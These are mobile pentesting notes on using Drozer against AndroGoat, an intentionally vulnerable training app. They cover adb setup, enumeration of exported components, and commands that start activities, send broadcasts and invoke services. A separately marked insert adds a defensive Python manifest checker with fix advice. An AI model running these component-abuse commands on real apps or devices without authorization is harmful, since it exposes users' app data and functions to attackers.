Mobile Pentesting Drozer:

# Step 1: Start Drozer Agent on Emulator
adb shell am start -n com.mwr.dz/.Drozer

# Step 2: Set up Port Forwarding
adb forward tcp:31415 tcp:31415

# Step 3: Connect from Host to Drozer Agent
drozer console connect

Useful Drozer Commands:

# List all installed packages
run app.package.list

# Find packages with debuggable flag
run app.package.debuggable

# Search for content providers in a specific app
run app.provider.finduris -a com.target.app

# Get specific package info
run app.package.info -a com.target.app

Find attack surface (exported activities, receivers, services and providers):

run app.package.attacksurface owasp.sat.agoat

Analyze Activity, Broadcast and Service

dz> run app.activity.info -a owasp.sat.agoat
dz> run app.broadcast.info -a owasp.sat.agoat
dz> run app.service.info -a owasp.sat.agoat
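The Drozer modules above enumerate which components the app exports at runtime. As an added example that is not part of the original notes, the following Python script performs the same check statically on an app's AndroidManifest.xml, the way a developer or reviewer would before release: it applies Android's default-export rules (an explicit android:exported value, otherwise an intent-filter implies export, and providers defaulted to exported before targetSdk 17) and flags every exported component that no android:permission, readPermission or writePermission guards. The embedded manifest and its package name com.example.demo are constructed for illustration and do not come from the page or from AndroGoat.

```python
"""Static check for exported Android components that lack a permission.

Added example (not part of the original Drozer notes): mirrors what
`run app.package.attacksurface` reports, but from the app's own
AndroidManifest.xml. The manifest below is constructed for illustration.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "receiver", "service", "provider")

# Constructed sample manifest (hypothetical package com.example.demo).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <uses-sdk android:targetSdkVersion="30"/>
  <permission android:name="com.example.demo.ACCESS" android:protectionLevel="signature"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".ShowData" android:exported="true"/>
    <receiver android:name=".DataReceiver" android:exported="true"
              android:permission="com.example.demo.ACCESS"/>
    <service android:name=".InvoiceService">
      <intent-filter><action android:name="com.example.demo.DOWNLOAD"/></intent-filter>
    </service>
    <service android:name=".InternalService" android:exported="false"/>
    <provider android:name=".NotesProvider" android:authorities="com.example.demo.notes"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(elem, target_sdk):
    """Apply the platform's default-export rules to one component element."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.find("intent-filter") is not None:
        # Components with an intent-filter are exported by default when
        # targetSdk < 31; from API 31 the attribute must be set explicitly.
        return True
    if elem.tag == "provider":
        # Content providers defaulted to exported before targetSdk 17.
        return target_sdk < 17
    return False


def is_protected(elem):
    """True if any permission attribute guards access to the component."""
    return any(_attr(elem, a) for a in ("permission", "readPermission", "writePermission"))


def find_unprotected_exports(manifest_xml):
    """Return (tag, fully-qualified name) for exported components without a permission."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    for elem in app:
        if elem.tag not in COMPONENT_TAGS:
            continue
        name = _attr(elem, "name") or ""
        if name.startswith("."):
            name = package + name  # expand the shorthand relative class name
        if is_exported(elem, target_sdk) and not is_protected(elem):
            findings.append((elem.tag, name))
    return findings


if __name__ == "__main__":
    for tag, name in find_unprotected_exports(SAMPLE_MANIFEST):
        print(f"{tag:9} {name}  exported without a permission")
```

On the sample manifest the launcher activity, the explicitly exported ShowData activity and the InvoiceService (implicitly exported through its intent-filter) are reported; the receiver is skipped because a signature permission guards it, and the provider is not exported under targetSdk 30. Anything reported here that is not meant to be reachable from other apps should get android:exported="false" or a permission, which is the fix for the findings the Drozer modules on this page surface.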

Exploit activity

dz> run app.activity.start --component owasp.sat.agoat <activity_name>

Send Broadcast to Exported Receiver

dz> run app.broadcast.send --component owasp.sat.agoat owasp.sat.agoat.ShowDataReceiver

Exploit Exported Service

dz> run app.service.start --component owasp.sat.agoat <service_name>
dz> run app.service.send --component owasp.sat.agoat <service_name>
dz> run app.service.start --component owasp.sat.agoat owasp.sat.agoat.DownloadInvoiceService
